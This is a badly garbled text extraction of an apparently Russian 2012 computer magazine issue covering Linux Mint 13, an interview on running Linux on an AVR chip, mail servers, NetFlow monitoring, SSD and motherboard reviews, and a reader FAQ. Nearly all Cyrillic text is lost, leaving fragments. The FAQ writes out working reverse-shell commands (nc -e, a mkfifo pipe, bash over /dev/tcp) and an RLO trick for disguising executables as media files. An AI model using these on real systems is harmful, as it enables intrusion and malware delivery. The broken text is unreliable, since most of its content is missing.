,
,
(COW) Linux VM, , 64 .
(,
170 000 , 60 000 ext4).
Btrfs SUSE
. ,
, .
1200 ,
10 000 . , 40%
, 30% , 13% , 5% 6% . 42 .
, Linux
. ,
,
.
, , ,
. z
INFO
2003
2005
2007
2010
2011
3.0 Linux
DFS Windows
2008.
IBM
Linux
08 /163/ 2012
BusinessWeek
Linux
Linux Foundation
Linux
Linux Android
Linux
20,
,
, ATM,
3.0
Linux
Microsoft
Kinect, ,
,
-.
ext4
3.0
punch
hole,
,
.
, 3.1
3.1 2.6.41.
113
UNIXOID
(grinder@tux.in.ua)
LINUX
MINT 13 MAYA
Linux-.
,
GNOME 3 Unity ,
-,
. ,
.
114
08 /163/ 2012
Linux Mint
UBUNTU?
Linux Mint
Open Source.
, Linux ,
. ,
(2006 ) ,
, .
Linux Mint Ada Kubuntu 6.06
Dapper Drake , , . ,
Linux Mint ,
.
GNOME,
KDE, XFce, GNOME-
. Linux
Mint , .
, .
, .
,
GNOME.
Distrowatch Linux Mint 2007 ,
Linux, , Debian, openSUSE, Fedora.
GNOME 3,
.
( ,
GNOME 3 User Experience).
Ubuntu Unity.
Linux Mint 11 Katya, Ubuntu
11.04, GNOME 2.
Ubuntu Distrowatch.
,
, Linux Mint 12
Unity GNOME 3. ,
Linux Mint, . Mint 12
GNOME 3, (Mint GNOME Shell Extension)
. DVD- MATE
08 /163/ 2012
Cinnamon
UBUNTU,
LINUX MINT
,
,
X86/X64,
115
UNIXOID
MATE
12- ,
.
Wi-Fi- Broadcom b43,
b43.blacklist=yes, GRUB .
,
. ,
, LibreOffice ( ).
.
, .
MDM, MATE
GDM 2.20. mdmsetup
.
CINNAMON
, .
,
, . , Cinnamon
( MATE) . , ,
Windows, .
Windows , Maya .
USB- ,
.
Cinnamon, ,
. -
: ,
, ,
. , ,
,
.
mintMenu.
,
116
MDM
,
. - .
, , ,
,
(SSH, FTP, WebDAV
Windows).
, e-mail, .
Windows Live Google
. ,
, .
Mint-X Mint-Z, GTK3+
. ,
. , , , , ,
Cinnamon (cinnamon-settings.py),
mintDesktop. Cinnamon
, .
, Cinnamon
cinnamon-spices.linuxmint.com. Mint
, PPA. :
$ sudo add-apt-repository ppa:bimsebasse/cinnamonextras
$ sudo apt-get update
WWW
LINUX MINT 13
Linux 3.2.0
Udev 175
GCC 4.6.3
X.Org 1.11.4
MATE 1.2
Cinnamon 1.4
LibreOffice 3.5.3.2
VLC 2.0.1
FileRoller 3.4.1
Evince 3.4.0
Totem 3.0.1
Linux Mint
linuxmint.com;
Linux Mint
goo.gl/BCeau;
,
Cinnamon
cinnamonspices.linuxmint.com.
08 /163/ 2012
INFO
UBUNTU 12.04
Linux Mint
. ,
, ;
,
(Yahoo, DuckDuckGo Amazon).
.
Yandex.
:
$ sudo apt-cache search cinnamon-theme
. ,
,
~/.themes (), ~/.local/share/cinnamon/applets
() /usr/share/cinnamon/extensions ().
cinnamon-settings,
.
LINUX MINT
, ,
. ,
(mintInstall),
. ,
,
, (
), .
. .
( ) .
, Linux Mint. Ubuntu (Ubuntu Software Center)
mintInstall , ,
,
.
Synaptic, , , ,
mintInstall .
Cinnamon , ( MATE ),
mintUpdate .
mintUpdate ,
. Linux Mint
, Ubuntu,
. ,
,
13- . 4- 5-
mintUpdate .
Linux Mint 13
,
2017 .
From freedom
came elegance,
,
Linux Mint
,
,
x86/x64,
.
: , ,
,
08 /163/ 2012
117
UNIXOID
mintUpdate
mintInstall
MATE
mintDesktop ,
: , ,
, . Cinnamon ( ).
mintBackup . mintWifi
Wi-Fi-, ( ):
mintNanny , .
, /etc/hosts:
0.0.0.0 odnoklassniki.ru # blocked by mintNanny
mintWelcome, .
DVD mintconstructor.
$ sudo mintwifi
mintUpload , FTP/SFTP/SCP-
. -
, Linux Mint
, . Cinnamon
,
. z
MATE VS CINNAMON
GNOME 3,
GNOME Shell, . ,
,
GNOME 2. .
MATE (mate-desktop.org)
Arch Linux
GNOME 2.32.
GNOME, , . ,
Nautilus Caja.
,
Gtk2/3-. -
118
1.2, , , , .
(,
Bluetooth)
, GNOME 2.
GTK3, .
Mint GNOME Shell
Extensions, Linux Mint 12,
,
GNOME Shell , MGSE
. 2012
Cinnamon (cinnamon.
linuxmint.com), , Linux Mint.
, -
.
Mutter Muffin. ,
, ,
, , GNOME Shell.
, MATE ,
Cinnamon .
1.4
. MATE
3D-,
Cinnamon OpenGL.
Linux.
08 /163/ 2012
.
.
-,
.
.
TSW ,
. ,
, .
TSW.
-, ,
, . -
( )
. , . 14/2
(495) 231-4383
. , . 29
(499) 724-8044
-, . 1
(812) 603-2610
TSW.
,
( ),
.
( ,
),
. ,
TSW,
.
. , . 10, . 32,
(495) 231-2363
www.kolrad.ru
www.allrad.ru
(495)730-2927/368-8000/672-7226
www.prokola.net
(812)603-2610/603-2611
UNIXOID
(execbit.ru)
0120
08 /163/ 2012
,
UBUNTU LINUX 8-
Ubuntu Linux.
8- ATmega1284p, 256
MMU.
, ,
Google.
Ubuntu Linux
(goo.gl/CM3bJ). , ,
,
SIMM 16 SD- 1 .
. ARMv5TE,
Ubuntu 9.04.
6,5 ,
ATmega1284p 24
( 20 ), , ,
: ,
Linux.
Ubuntu,
, .
, ,
,
, ,
Google, .
, .
, ?
-, A .
VMware, Kno, Lab126 (Amazon),
Google.
PalmOS (
), Android
iOS.
46 (
4). -
08 /163/ 2012
1999-.
, .
.
,
.
( Amazon
Google)
, .
,
. AVR
,
, AVR-GCC
.
, AVR-GCC -
:). RAM,
,
. , ,
AVR
RAM,
- !
. AVR-GCC
int 16- ,
.
. , :
, .
, . ,
,
32- 33
0, AVR-GCC 1
. , .
. . , .
, ,
, ,
. ,
56 kernel is up.
,
.
.
?
-
A ,
,
,
/.
,
, ,
, :).
.
, .
, .
. ,
.
VoIP-.
,
.
Linux
?
?
,
A .
.
DGOS
Android Palm
121
UNIXOID
.
, ,
. -,
. , .
.
ARM?
:
A ARM,
PalmOS,
.
- , ARM.
x86 MIPS. 86 , MMU MIPS .
Ubuntu, -
Embedded? Proof of concept?
, ,
A
, , Ubuntu
.
.
,
,
CentOS.
PALMOS
PalmOS.
DGOS (dgosblog.blogspot.com) ,
, POSIX
PlamOS. : PalmOS- PowerSDHC,
SDHC ;
BluePill, -,
,
;
warpSpeed . palmpowerups.com.
MMU)
?
,
A -
8 .
8-, 16- 32- (
).
: AVR PIC18.
PIC18 (
), .
dsPIC33 ( AVR),
PIC32.
, ,
no-MMU, -
.
,
MMU .
- .
, , ,
. ?
-
? C++?
A , -
MMU? (uClinux, ,
. , ,
.
, x86 for(char i = 0; i < someVal;
i++) for(int i = 0; i < someVal; i++)
, ARM
; ARM
, 1 .
,
, 8 ,
char.
.
C++ ,
. C++, ,
(, ).
,
,
C++.
,
Google. ?
Android
A Android
Android.
Google I/O.
Accessory
Development Kit.
google.com. . :)
Accessory
Development Kit.
?
Accessory Development Kit
A , Android
, .
1 ADK,
: goo.
gl/Ztsfo, goo.gl/OG0LM. 1
. 2 .
.
,
Google I/O .
Google
:
, ,
.
?
ATmega 1284
122
08 /163/ 2012
SD-
, . Google
. ?
44. ? 45.
? 41. . Google
( - ),
. ,
Google- .
,
,
.
. .
, Google
, , 5080%
. .
, Lab126,
VMware, Kno.
,
A .
.
, ,
,
, .
:). , ,
, ,
.
?
. :)
Amazon ,
A . Kno: goo.gl/z5mH9.
, Intel Kno 30
.
. VMware
VAssert, ,
Replay Debugging.
08 /163/ 2012
Kno.
? ,
?
, ?
Kno :
A ,
.
14- ,
, ,
. Linux
( Android). , - 100
,
Intel Kno ,
.
DGOS?
?
?
:
A dgosblog.blogspot.com.
PalmOS
.
, , ,
, Palm , , .
DGOS -
?
, ,
A , - .
. , .
.
-
DGOS?
.
.
, , - mesh
networking. .
?
?
, .
A ? (-
) ,
, .
.
, ,
5700 .
.
,
. ,
. ,
.
. .
,
. ,
105 /,
300.
. :)
?
,
? :)
A .
, . ,
, . z
123
SYN/ACK
(grinder@synack.ru)
WARNING
CommuniGate Pro
8010
.
,
-,
,
,
,
.
,
.
124
08 /163/ 2012
iRedMail
: iRedMail
: iredmail.org
: GNU GPL
: *nix
*nix
, ,
.
iRedMail
. ,
,
Postfix/Dovecot
SMTP, POP3 IMAP.
,
( )
.
,
.
,
IndiMail
: IndiMail
: indimail.sf.net
: GNU GPL
: *nix
08 /163/ 2012
,
( , Qmail). IndiMail
(queue
collection),
qmail-send/qmail-todo
.
, Qmail.
,
( 200). ,
CONTROLDIR , QUEUEDIR .
IndiMail
,
, . :
IndiMail,
.
FLASH ( Ncurses).
MySQL,
OpenLDAP.
systemd.
,
SETUID,
//, trust partitioning,
IP, access-list,
iRedMail
,
.
; MySQL, ,
( ).
i386/x86_64
Red Hat Enterprise Linux, CentOS,
Gentoo Linux, Debian, Ubuntu, openSUSE Open/
FreeBSD.
, .
- iWebAdmin QmailAdmin
tcprules, , TLS/SSL
.
IndiMail 32/64 *nix
.
,
Linux (RHEL/CentOS
5/6, Fedora, openSUSE/SLE, Mandriva, Debian
Ubuntu). 45
( /var/indimail/bin),
- iWebAdmin (
QmailAdmin), .
125
SYN/ACK
Rumble
: Rumble
: rumble.sf.net
: GNU GPL
: *nix, Windows
, SMTP
(ESMTPSA), POP3 IMAP. , .
.
C/C++, API
(Lua C/C++). . SSL/TLS, SQLite MySQL,
(MD5/PLAIN/STARTTLS),
white/grey/
blacklist, SpamAssassin, BATV VERP
(Variable Envelope Return Path).
.
x86/
x64- Linux (Generic,
Ubuntu, Debian). ,
,
.
. rumble.conf. - (
2580) modules/rumblelua/auth.cfg (
), - .
,
,
, .
SQLite,
MySQL,
.
,
.
,
. ,
RumbleLua User
.
,
, ,
, ,
,
. ,
.
Axigen: - -
Axigen
Active Directory, .
, ,
, MAPI, OP3- IMAP-.
. ,
IM-,
Jabber/XMPP. , Axigen
,
.
TLS/SSL,
:
plain, login, cram-md5, digest-md5 .
(Kaspersky, Dr.Web,
Symantec, ClamAV ) (
SpamAssassin).
SPF, DKIM, // IP / .
.
Axigen MS Outlook,
.
Axigen .
Debian,
RHEL CentOS 5/6, SUSE Linux Enterprise 10/11,
Fedora 12/13, openSUSE 11.2/11.3, FreeBSD
7.x/8.x, Solaris 10 x86/SPARC Win2k3/2k8 (x86/
x64). Virtuozzo
.
GUI-, ,
.
1015 .
,
.
, . Axigen Free Mail
Server (Office Edition)
e-mail .
- Rumble
Axigen
: Axigen
: axigen.com/ru
: GNU GPL
: Linux, FreeBSD, Solaris, Windows
, ,
(SMTP/POP3/IMAP) , ,
, Gecad Technologies.
-, Ajax,
.
,
.
:
, , ,
.
/
CSV
. ,
, ActiveSync
, .
.
- ( 9000- ), .
.
LDAP-
( OpenLDAP eDirectory)
126
08 /163/ 2012
CommuniGate Pro
: CommuniGate Pro
: communigate.com
: Free/
: *nix, Windows, Mac OS X
, IM, VoIP, . , VoIP
/ , ,
(IVR), , ,
. CommuniGate
( ), IPv4
IPv6, SMTP, SIP, IMAP,
XMPP, LDAP, RADIUS, XIMSS, CalDAV, WebDAV,
MAPI .
(Session Border Controller)
NAT-. CGP LDAP- .
BlackBerry
AirSync ( ).
. ,
.
-,
, . -
,
(
). -
PDA
WAP . VoIP
- .
, , POP3-, ,
.
. ,
,
.
.
(,
), SIP Farm.
. ,
CommuniGate Pro IP-
SIPNET.
, Active Directory
, .
IP-,
.
, ,
SSL, TLS,
S/MIME .
API .
. -
- CommuniGate Pro
,
Sophos, McAfee, MailShell, Cloudmark.
,
DNSBL (RBL),
IP- ,
.
, ,
. , ( 8010- ,
).
,
, .
, .
Community Edition,
, Corporate Edition Service
Provider .
ZENTYAL
, Linux ,
, .
Zentyal (zentyal.org) ,
Ubuntu Server ( Ubuntu 12.04 LTS)
. Zentyal
, UTM,
.
/. ,
. Zentyal ,
, master/slave
LDAP/AD.
08 /163/ 2012
,
. , .
iRedMail, Axigen Rumble;
,
,
Axigen, IndiMail CommuniGate
Pro. VoIP. z
127
SYN/ACK
SYN/ACK
(grinder@synack.ru)
NETFLOW
,
: , ,
.
,
NetFlow.
NETFLOW
NetFlow Cisco
(goo.gl/vM2l7) , .
, NetFlow Cisco,
( Juniper Enterasys) .
. NetFlow v1,
1990 , ,
( , ),
.
Netfilter. , 2004
RFC 3954. v9 IPFIX (IP Flow Information Export, RFC 3917),
NetFlow v10. v24
Cisco, .
v5,
IPv4-. ,
(flow record) TCP/IP. v5 , ,
, IP , , TOS- TCP-.
IPv6, MPLS, BGP -
128
08 /163/ 2012
IP- fprobe
, (
). , Sampled NetFlow
, ,
.
fprobe , ,
, ( r
0), (B q),
(t). tcpdump .
LINUX
NetFlow
, DD-WRT . ,
VMware vSphere 5
NetFlow v5,
. ,
. Cisco NetFlow
192.10.0.2:9001 :
router(config)#
router(config)#
router(config)#
router(config)#
router(config)#
NetFlow-, :
fprobe (fprobe.sourceforge.net) Linux,
libpcap, fprobe-ulog, libipulog;
ipt-netflow Linu :
iptables;
softflowd (code.google.com/p/softflowd) Linux/FreeBSD,
NetFlow v1/v5/v9;
pfflowd (mindrot.org/projects/pfflowd) OpenBSD;
nProbe (ntop.org/products/nprobe) / Linux, FreeBSD Windows, NetFlow v5/v9/
IPFIX;
IPCAD (lionet.info/ipcad) Linux, FreeBSD, OpenBSD, Mac
OS X/Darwin Solaris, raw BPF-, PCAP,
iptables ULOG & IPQ;
fSonar (softpiua.com/ru/products/softpi/fsonar.html)
Windows, NetFlow v5/v9;
ndsad (ndsad.sf.net) , NetFlow v5
Windows (winpcap), Linux (libpcap), Mac OS X FreeBSD;
PRTG Network Monitor (paessler.com/netflow_monitoring) Windows XP
( ).
,
NetFlow: -T cnfp. Softflowd. ,
, , .
+
.
flow-tools,
, . flow-tools
Perl- FlowScan
(caida.org/tools/utilities/flowscan),
flow-capture ( NetFlow flow-tools) RRD. FlowScan
: CUFlow,
CampusIP, SubNetIO. ,
nfdump (nfdump.sf.net), NetFlow v1/v5/
v7/v9 IPFIX ( ),
NfSen (Netflow Sensor, nfsen.sf.net).
NSEL- nfdump, Cisco ASA. nfdump
: nfcapd (,
), nfdump ( ), nfprofile ( ,
,
NetFlow, . ,
Ubuntu/Debian
.
$ sudo apt-get install fprobe
, ( IP- ).
.
/etc/default/fprobe:
08 /163/ 2012
NetFlow- tcpdump
129
SYN/ACK
SYN/ACK
), nfreplay (
/), nfclean.pl
( ), ft2nfdump ( flow-tools
nfdump). nfcapd
( ,
), nfdump.
, nfdump Ubuntu/Debian
:
NFSEN
NfSen (sf.net/apps/
trac/nfsen-plugins).
plugins, nfsen.conf,
.
nfcapd nfdump
NfSen. nfdump
, , /etc/default/nfdump:
$ cat /etc/default/nfdump
# nfcapd is controlled by nfsen
nfcapd_start=no
, .
nfcapd-, UDP-:
NFSEN
NfSen. ,
. PHP Perl,
RRDtool. LAMP-
Perl- Mail::Header Mail::Internet. :
$ sudo apt-get install apache2 libapache2-mod-php5 \
php5-common libmailtools-perl rrdtool librrds-perl
, ,
'-b'. '-R host/port'
NetFlow- .
'-p' , pcap-.
nfdump, :
$ sudo nfdump -R var/cache/nfdump/router1
Date flow start Duration Proto Src IP Addr:Port Dst IP
Addr:Port Packets Bytes Flows
2012-07-05 10:09:12.112 0.001 UDP 22.22.22.22:1234 ->
192.10.19.10:22 1 400 1
$
$
$
$
wget -c http://goo.gl/CYk4s
tar xzvf nfsen-1.3.6p1.tar.gz
cd nfsen-1.3.6p1
cp etc/nfsen-dist.conf etc/nfsen.conf
.
, , .
, , ,
nfdump
(line, long, extended custom),
line. ,
'-o'. nfdump , ,
man nfdump,
.
$ nano etc/nfsen.conf
$BASEDIR = "/usr/nfsen";
# ,
$HTMLDIR = "/var/www/nfsen/";
# , nfdump
$PREFIX = '/usr/bin';
# , -
$USER = "www-data";
$WWWUSER = "www-data";
$WWWGROUP = "www-data";
# , ,
# "col"
, NfSen
, Flowscan
130
08 /163/ 2012
, NfSen
NfSen
%sources = (
'ROUTER1' => { 'port' => '9001',
'col' => '#0000ff', 'type' => 'netflow' },
);
Apache:
$ sudo nano /etc/apache2/conf.d/nfsen.conf
<Directory /var/www/nfsen/>
DirectoryIndex nfsen.php
</Directory>
$MAIL_FROM = 'admin@example.com';
$SMTP_SERVER = 'smtp.example.com';
, nfcapd, ,
. .
$ sudo ./install.pl etc/nfsen.conf
Perl-,
nfsen.conf . nfsen, nfcapd:
$ sudo /usr/nfsen/bin/nfsen start
:
$ sudo ln -s /usr/nfsen/bin/nfsen /etc/init.d/nfsen
http://_/nfsen/nfsen.
php
. ,
IP-, .
any, proto TCP. ,
SSH-, src or dst port 22,
IP . Live,
, nfsen.conf.
, (Live New Profile).
, . z
PMACCT
Pmacct
,
: ISP, IXP, CDN, , - .
Linux, *BSD, Solaris
. IPv4 IPv6,
(libpcap, Netlink/ULOG, NetFlow v1/v5/v7/
v8/v9, sFlow v2/v4/v5 IPFIX),
(IPFIX,
NetFlow v5/v9 sFlow v5)
memory tables, MySQL, PostgreSQL, SQLite,
BerkeleyDB .
, ,
,
08 /163/ 2012
, .
BGP-
IS-IS/IGP-
, BGP/
MPLS VPNs (RFC 4364).
(GTP).
, RRDtool, GNUPlot,
Net-SNMP, MRTG Cacti.
.
,
Pmacct, BWstat,
pNRG, pmGraph, netactuator, FloX (Flow eXplorer),
pmacct-frontend .
WWW
INFO
Cisco,
NetFlow:
goo.gl/vM2l7;
NetFlow 5 9.
FreeBSD
Softflowd: code.google.
com/p/softflowd;
UDP
samplicator
(code.google.com/p/
samplicator).
,
,
.
WARNING
Sampled NetFlow
,
.
131
FERRUM
BE QUICK
OR BE DEAD
SATA 3.0
, , ,
.
, : 480 SSD
? 120 256
.
SANDFORCE
, , ,
. ,
HDD,
. , SSD
.
,
:
- SSD.
. , Apple
NVIDIA, SandForce, , ,
LSI Corporation. , SandForce, ,
NAND-,
SSD .
Marvell, SandForce
SF-2281. Intel
,
Intel SSD 520 Series.
132
,
, ,
,
. ,
. ,
:
/ 500 /, SandForce SF-2281,
.
? ,
SSD, -,
.
,
Toggle-mode DDR NAND.
,
SandForce
/
SSD.
?
.
,
-.
5/5 /,
SSD.
, , JPG, MP3
, .
/
SSD , /
. ,
. , -
Corsair CSSD-F120GBGT-BK
Corsair CSSD-P128GBP-BK
Intel SSDSC2CW240A3K5
KINGMAX KM240GSMP35
Kingston SH100S3/120G
OCZ VTX3-25SAT3-240G
Plextor PX-256M3P
PNY P-SSD2S120G3-BLK
Verbatim SSD SATA III
. SSD
, . 2 ,
, ,
3- .
, ,
SandForce.
(
).
SSD PCMark Vantage
( HDD) , .
,
. ATTO Disk Benchmark
, SSD
,
,
HDD.
(
128 ) ( 4 )
Iometer.
, ,
. , 240
120
SandForce. .
: Intel Core i7-3960X, 3300
: ASUS P9X79 PRO
: 4 4 , G.SKILL F31700CL9-4GBZH, DDR3 1600
: Sapphire Radeon HD 3450
: Corsair CSSD-F120GB2-BRKT
: Corsair CP-9020006
: Windows 7 , 64-
08 /163/ 2012
Be quick or be dead
CORSAIR CSSDF120GBGT-BK
orsair SSD SATA 3.0: Force
Series 3, Perfomance
Series Pro Force Series GT.
. ,
, . 3,5 2,5- .
Corsair CSSD-F120GBGT-BK SandForce SF-2281 ,
25- .
,
/ Iometer,
Intel.
,
SSD 120 ,
. ,
1,7 .
6000
.
INTEL SSDSC2CW240A3K5
Intel SSD 520 Series SATA 3.0 Cherryville
, SSD 60 480 .
, 510- . ,
Marvell 88SS9174-BKK2, Cherryville ,
-, SandForce SF-2281.
SSD Toggle-mode DDR
NAND 25 .
Intel SSDSC2CW240A3K5
. :
SSD: SATA, Molex SATA, - -. , ,
,
, Intel. , Intel
SSDSC2CW240A3K5 .
12 600
.
08 /163/ 2012
133
FERRUM
KINGMAX KM240GSMP35
KINGMAX
: , , HDD,
, ,
. SSD
- 2,5 , mSATA Half-Slim.
KINGMAX KM240GSMP35 . ,
SSD . SandForce
SF-2281 , KINGMAX KM240GSMP35 . ,
, , , , 25 .
:
, . KINGMAX SMP35
Client (, ), , Intel
SSDSC2CW240A3K5, Molex SATA- , . KINGMAX SMP32 Client,
, .
8800
.
OCZ VTX3-25SAT3-240G
, OCZ . ,
SSD SandForce ,
. OCZ
,
. OCZ VTX3-25SAT3-240G
OCZ Vertex 3 SATA III 2.5''
SSD. ,
. , OCZ
1 ,
. OCZ VTX3-25SAT3-240G
, , , . , OCZ
SSD
, 2011 Indilinx.
OCZ VTX3-25SAT3-240G.
- ,
My SSD is faster than your HDD.
-:
:
:
:
:
:
:
:
134
Corsair CSSDF120GBGT-BK
2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
555 /
515 /
2
20
11 400
.
KINGMAX
KM240GSMP35
Intel SSDSC2CW240A3K5
2,5
SATA 3.0
MLC, Toggle-mode DDR NAND, 25
SandForce SF-2281
550 /
520 /
1,2
240
2,5
SATA 3.0
MLC,
SandForce SF-2281
550 /
520 /
1,2
240
08 /163/ 2012
Be quick or be dead
5200
.
KINGSTON SH100S3/120G
, Kingston SH100S3/120G -
SSD SATA 3.0,
. ,
,
.
Kingston SH100S3/120G
, .
SandForce
SF-2281, ,
25- .
3,5 . ,
, Kingston
SH100S3B/120G ,
. SATA-, , , 2,5-
USB 2.0 Acronis.
,
SSD,
HDD .
6600
.
OCZ VTX325SAT3-240G
2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
550 /
520 /
2
240
08 /163/ 2012
Verbatim SSD
SATA III
2,5
SATA 3.0
MLC
SandForce SF-2281
550 /
510 /
2
120
Kingston
SH100S3/120G
2,5
SATA 3.0
MLC, , 25
SandForce SF-2281
555 /
510 /
1
120
Corsair CSSD-F120GBGT-BK
,
. -
SSD, Intel SSDSC2CW240A3K5.
,
, ,
, -
. z
135
PCMARK VANTAGE,
PCMARK VANTAGE, /
Corsair CSSD-F120GBGT-BK
Corsair CSSD-F120GBGT-BK
Intel SSDSC2CW240A3K5
Intel SSDSC2CW240A3K5
KINGMAX KM240GSMP35
KINGMAX KM240GSMP35
Kingston SH100S3/120G
Kingston SH100S3/120G
OCZ VTX3-25SAT3-240G
OCZ VTX3-25SAT3-240G
Verbatim 47378
Verbatim 47378
0
00
60 0
00
58 0
00
56 0
00
54 0
00
52 0
00
50 0
00
48 0
00
46
PCMark Vantage
Windows Defender
Gaming
Improting Pictures to Windows photo Gallery
Windows Vista startup
Video editing using Windows Movie Market
Windows Media Center
Adding music to Windows Media Player
Application loading
PCMark Vantage
IOMETER: /
(4 ), /
IOMETER:
/ (128 ), /
Corsair CSSD-F120GBGT-BK
Corsair CSSD-F120GBGT-BK
Intel SSDSC2CW240A3K5
Intel SSDSC2CW240A3K5
KINGMAX KM240GSMP35
KINGMAX KM240GSMP35
Kingston SH100S3/120G
Kingston SH100S3/120G
OCZ VTX3-25SAT3-240G
OCZ VTX3-25SAT3-240G
Verbatim 47378
Verbatim 47378
10
15
20
Marvell
300
320
340
360
380
Iometer Marvell
IOMETER PATTERNS, /
Corsair CSSD-F120GBGT-BK
Intel SSDSC2CW240A3K5
KINGMAX KM240GSMP35
Kingston SH100S3/120G
OCZ VTX3-25SAT3-240G
Verbatim 47378
Database
Fileserver
Workstation
Webserver
10
20
30
40
50
60
70
400
12 2200 .
6 1260 .
,
!
.
: 210
x 09 (152) 2011
LULZSEC
09 (152) 2011
082
1. , , shop.glc.ru.
2. .
3.
:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
500 .
WINDOWS 7
PHPMYADMIN
064
ANDROID 070
152
,
JAVASCRIPT 050
:
, ,
FOX NEWS
+ + 2 DVD:
162
( 35% , )
!
,
.
12 3890 (24 )
6 2205 (12 )
.
,
FERRUM
, ,
Z77 !
GIGABYTE
G1.SNIPER 3
: LGA1155
: Intel Z77 Express
: 4 DIMM,
DDR3 1066-2666
: 4PCI Express
x16, 2PCI Express x1, 1PCI
: 6SATA
3.0, 4SATAII, 1mSATA
: 5.1 Creative CA0132
: 1Intel 1000 /,
1Qualcomm Atheros Killer E2201
1000 /
:
1HDMI, 1DisplayPort, 1DVI-D,
1D-Sub, 1PS/2, 2RJ-45,
6USB 3.0
-: E-ATX
: Intel Core i5-2500K,
3,3
: MSI TWIN FROZR II
HD 5830, 1024
: G.Skill
Ripjaws-Z F3-17000CL9Q-16GBZH,
24
: Corsair CSSDF120GB2, 120
: ENERMAX Platimax,
750
: Windows 7
138
11 700
.
08 /163/ 2012
, , Z77 !
, ,
Z77 Express H77 Express.
Ivy Bridge, , GIGABYTE G1.Sniper 3.
GIGABYTE G1.Sniper 3 : -
.
,
, G1-Killer.
,
PCI Express x16,
.
,
12.
, , , .
?
PCI Express x16 .
x16 + x16, 16 + 8 + 8,
8 + 8 + 8 + 8.
Intel Ivy Bridge PCI Express x16
16, PLX PEX8747 GIGABYTE
16. !
ATX4P,
ATX12V.
, SATA.
Intel
. , DMI 2.0. C ,
.
,
USB 3.0 DMI 2.0. USB 3.0
Intel.
16 PCIe , .
08 /163/ 2012
GIGABYTE G1.Sniper 3
- E-ATX,
. PCI Express
x16, PCI Express x1
- PCI.
.
SSD
mSATA.
,
.
GIGABYTE G1.Sniper 3 ,
. 64
,
HDD SSD. ,
.
. , Reset,
BIOS,
POST-.
.
SATA-, .
, RAID
0/1/5/10. SATA 3.0, CPU,
Marvell 88SE9172,
RAID 0 RAID 1.
I/O- : RJ-45, HDMI, DisplayPort,
DVI-D, D-Sub, USB 3.0,
USB 2.0.
S/PDIF.
GIGABYTE G1.Sniper 3 GIGABYTE Ultra
Durable 4,
,
. ,
, ,
.
BIOS,
. UEFI BIOS,
GIGABYTE
.
, .
G1-Killer
(Killer Game Networking Intel
Gigabit Ethernet) ,
Creative.
USB 3.0
,
. Bluetooth 4.0
Wi-Fi 802.11n,
PCI Express x1,
.
GIGABYTE G1.Sniper 3 ,
GIGABYTE ,
. GIGABYTE G1.Sniper M3
- mATX, PEG-,
PCI Express x1,
2400 ,
SATA II SATA 3.0 RJ-45
. ,
.
GIGABYTE G1.Sniper 3 .
Super Pi 1.5XS
1
,
. wPrime 1.55
, 32 1024
, .
CINEBENCH R11.5 WinRAR
.
,
GIGABYTE G1.Sniper 3
, . ,
,
Intel
.
,
. GIGABYTE
G1.Sniper 3, ,
,
Wi-Fi 802.11n Bluetooth 4.0,
PCI Express x16. z
139
FAQ
FAQ
FAQ@REAL.XAKEP.RU
IDE,
.
?
IDE A
, ,
,
.
,
.
,
EditorConfig (bit.ly/editorconfig).
,
,
,
Notepad++ Sublime Text 2
Emacs Visual Studio.
.editorconfig.
.htaccess, - Apache,
.
, .
, .
-:
;
;
root = true
;
[*.py]
;
indent_style = space
;
indent_size = 4
;
end_of_line = LF
Linux
Netcat,
'-e' '-c',
?
Netcat
A TCP/IP.
,
-
? ;-)
.
, . -
, .
Netcat bash
, FIFO-.
nc -e /bin/bash 192.168.1.13 1337
:
mkfifo pipe;
cat pipe|/bin/bash|
nc 192.168.1.13 1337 >pipe;
rm pipe
\
\
\
bash
,
Netcat,
TCP, /dev/tcp.
- :
/bin/bash -i >
/dev/tcp/192.168.1.13/1337
0<&1 2>&1
\
\
:
Windows
ARP-poisoning?
,
A
HTTP-
, ,
,
. HTTP ,
Burp Suite
.
140
Burp.
( Proxy Options)
,
loopback-, Generate CA-signed per-host
certificates. ,
ProxyDroid ( Google Play),
.
,
, .
Burp Suite IP .
, ,
, , Generate a
CA-signed certificate with a specific hostname,
.
08 /163/ 2012
MITM-
. ARP-
VBS
.
DecaffeinatID (bit.ly/decaffeinatid) ARPFreeze
(bit.ly/arpfreeze).
Irongeek
.
IDS,
ARP-,
(
) .
. ARPFreeze ,
GUI- netsh ARP,
DecaffeinatID
IP- MAC-.
,
ARP-,
,
.
Android Google Play ?
A
, , ,
apk-. , , ! :-)
Chrome APK Downloader (bit.ly/apkdownload).
,
.
FiletypeID
(bit.ly/filetypeid).
4720 ,
. ,
50/50, ,
,
(Fat elf),
,
.
,
.
?
, ,
, ,
Hex-,
,
ANDROID, SSL?
. IE
, Burp,
.
, , . ,
,
. .
08 /163/ 2012
,
,
,
.
cer- SD- .
Location & Security
Install from SD card
.
Profit!
,
,
.
, , - ,
Proxy Burp Suit
.
141
FAQ
,
, - . , ,
/, Device ID,
.
Device ID, Google Play.
, apk-
,
,
.
Windows,
?
Windows
A
,
.
, .exe
,
-
(RIGHT-TOLEFT OVERRIDE).
,
.
,
justafile3pm.exe
- u\202e
e 3. - .exe, ,
justafileexe.mp3
RLO- , U+202E:
Right-To-Left Override.
TCP?
A
, ,
,
TCP-data , .
Matasano Port Forwarding
Interceptor,
.
PFI TCP- .
IP- , ,
142
,
. /
TCP-.
,
. ,
,
.
HDMI HEC.
DOMXss?
, DOMXss
A
,
,
.
,
.
Firefox DOMinator (bit.ly/domxsstool).
.
-
?
DDoSA , -
- -.
, , ,
.
, ,
,
.
ApacheBench (ab).
,
- Apache.
, ab
URL , ,
,
.
URL.
ab -n 10000 https://myservice.tst/
myscript.php
.
:
,
HTTP-,
HTTP-, ,
POST PUT.
SSL- (SSL2, SSL3, TLS1)
. z
08 /163/ 2012
>Net
AthTek NetWalk
BWMeter 6.2.2
Connectify 3.5.1
DNSDataView 1.40
GMail Drive 1.0.19
GNS3 0.8.2
IMAPSize 0.3.7
mRemoteNG 1.69
>Multimedia
AIMP 3.10
doPDF 7.3.381
Fotobounce 3.7.2
FotoSketcher 2.30
Foxit Reader 5.3.1
Machete Lite 3.8
MetatOGGer 4.5
MPTagThat 3.0.7
Okozo Desktop 2.1.1
Poladroid 0.9.6
SaveGameBackup.net 1.41
Sculptris Alpha 6
Similarity 1.7.1
SMRecorder 1.2.4
SPlayer 3.7
VidCoder 1.3.2
YACReader 0.4.5
>Misc
Auspex 1.3.5.118
